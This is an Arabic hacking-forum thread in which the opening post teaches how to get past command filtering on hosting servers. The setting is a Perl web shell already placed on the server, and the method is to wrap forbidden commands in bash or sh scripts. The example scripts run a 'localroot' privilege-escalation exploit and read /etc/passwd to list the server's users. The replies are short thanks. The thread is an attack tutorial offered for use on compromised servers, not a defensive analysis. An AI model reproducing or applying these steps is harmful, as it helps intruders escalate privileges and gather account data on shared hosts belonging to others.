حالة الموضوع:
مغلق
  1. kes-kbz

    kes-kbz Developer

    الأنتساب:
    ‏13 مايو 2012
    المشاركات:
    55
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الوظيفة:
    SeCuRiTy & HaCKeD
    الإقامة:
    K.$.A
    السلام عليكم ورحمة الله وبركاته

    الموضوع مثل ماهو بالعنوان وهو :

    تخطي عدم القدرة على تطبيق اوامر على السيرفرات

    مثلا امر معين ممنوع بالسيرفر بحيث عند تطبيقه يجيك :

    Forbidden = ممنوع

    Or

    Not Acceptable = غير مقبول

    يعني مثلا عندك شل بيرل مشغله على سيرفر معين

    وجيت تطبق اوامر يطبق معك ولاكن بعض اوامر مفلترة

    او اي يوزر على السيرفر يطبقها مايطلعله الناتج

    السبب مو تصريح للاوامر لان لو الروت مصرح امر معين

    تصريح فقط للروت يعني مايطبقه الا الروت فبهذه الحالة

    لايمكنك تخطي تنفيذ هذا الامر ..

    ولاكن بعض السيرفرات يمنعون اوامر معينة لايمكنك تنفيذها

    والتخطي يكون بتشفير الامر المراد تنفيذه ..

    وفيه سكربت بيرل يشفر الاوامر .. يعني تكتب الامر ومن ثم يشفره

    ويرسله .. والنتيجة تتخطى الاوامر الممنوعة ...

    اليوم طريقتنا هي بالشل سكربت .. نسوي كود بسيط ونكتب الامر

    المراد تنفيذه على السيرفر ... مثلا بعض الاستضافات تمنع امر التشغيل :

    كود PHP:
    ./ 
    نسوي شل سكربت ينفذ امر التشغيل كمثال نبي نشغل لوكال روت

    نشوف مع بعض السكربت الشل :

    كود PHP:
    #!/bin/bash

    echo "[ Output ]";

    echo 
    " ";

    ./
    localroot 

    السطر الاول للشل سكربت ويتم تشغيل الشل سكربت هكذا :

    كود PHP:
    bash dr.sh 
    شغلنا الشل سكربت بامر : bash وكان اسم الملف : dr.sh

    طبعا بعد رفع السكربت نصرحه تصريح : 755

    طيب لو امر : bash ممنوع نستخدم امر : sh لتشغيل السكربت مثال :

    كود PHP:
    sh dr.sh
    طيب لو مترجم الـ bash مصرح تصريح يمنعك من تشغيل سكربتات الـbash

    نضبط الشل سكربت بالنحو التالي :

    كود PHP:
    #!/bin/sh

    echo "[ Output ]";

    echo 
    " ";

    ./localroot

    ويتم تشغيل الشل سكربت هكذا :

    كود PHP:
    sh dr.sh 
    وبامكاننا تشغيل الشل سكربت البادء بسطر :

    كود PHP:
    #!/bin/sh 
    بالامر هذا :

    كود PHP:
    bash dr.sh 
    وتشغيل الشل سكربت البادء بسطر :

    كود PHP:
    #!/bin/bash 
    بالامر :

    كود PHP:
    sh dr.sh 
    مثال اخير لتطبيق امر لاستخراج يوزرات السيرفر :

    كود PHP:
    #!/bin/bash

    echo "[ Output ]";

    echo 
    " ";

    cat /etc/passwd
    وتشغيله مثل ماتم تشغيل السكربتات سابقا ...

    بالطريقة هذي استغلينا سكربتات الشل بتنفيذ اوامر على السيرفر

    ~ اوضح لكم الطريقة اكثر ~

    انت كيوزر على السيرفر والروت مانع من تنفيذ كم امر معينات على السيرفر

    طبعا هذي حماية للسيرفر .. وتستخدمها استضافات مشهورة ..

    تخلي تنفيذ الامر من الشل سكربت بدلا من ان تقوم بتنفيذه انت مباشرة

    والشل سكربت وامر تشغيله عنده صلاحية تشغيل السكربت

    وتنفيذ الامر الموجود فيه .. طبعا بصلاحية يوزر ...

    وبالاخير هذي طريقة من طرق تخطي عدم تنفيذ الاوامر ..

    ومثل ماقلت يوجد سكربتات بيرل لتشفير الاوامر لتخطي الحماية هذي

    وان شاء الله راح انزل السكربت باقرب فرصة ..

    ان اصبت فمن الله وان اخطأت فمن نفسي والشيطان

    ... تحياتي للجميع ...​
     
  2. 3mran

    3mran Developer

    الأنتساب:
    ‏2 ابريل 2012
    المشاركات:
    70
    الإعجابات المتلقاة:
    12
    نقاط الجائزة:
    8
    رد: تخطي عدم القدرة على تطبيق اوامر على السيرفرات

    يعطيـك العافية
    بـارك الله فيـك
    جاري التقييم ان أمكن
     
  3. ! ـآوتآر !

    ! ـآوتآر ! DeveloPer Plus

    الأنتساب:
    ‏19 يوليو 2012
    المشاركات:
    192
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    18
    الإقامة:
    السـ جــــده ـعوديـة
    رد: تخطي عدم القدرة على تطبيق اوامر على السيرفرات

    *

    وٌعٌلَيِکمً الَسِلَامً وٌرحًمًة الَلَهّ وٌبًرکاتٌتٌهّ

    يِعٌطِيِک الَعٌافُيِة

    تٌسِسِلَمً يِمًيِنِک
     
  4. Dr.H4CkEr

    Dr.H4CkEr DeveloPer Plus

    الأنتساب:
    ‏3 أكتوبر 2011
    المشاركات:
    209
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    18
    الإقامة:
    بلآد الحرمين .. الريآض ..
    رد: تخطي عدم القدرة على تطبيق اوامر على السيرفرات

    بارك الله بك ووفقك يارب
     
  5. ś‡òÞ Ħąć

    ś‡òÞ Ħąć Developer

    الأنتساب:
    ‏20 مارس 2013
    المشاركات:
    64
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    رد: تخطي عدم القدرة على تطبيق اوامر على السيرفرات

    تسلم اياديك حبيبي
    )5:"​
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة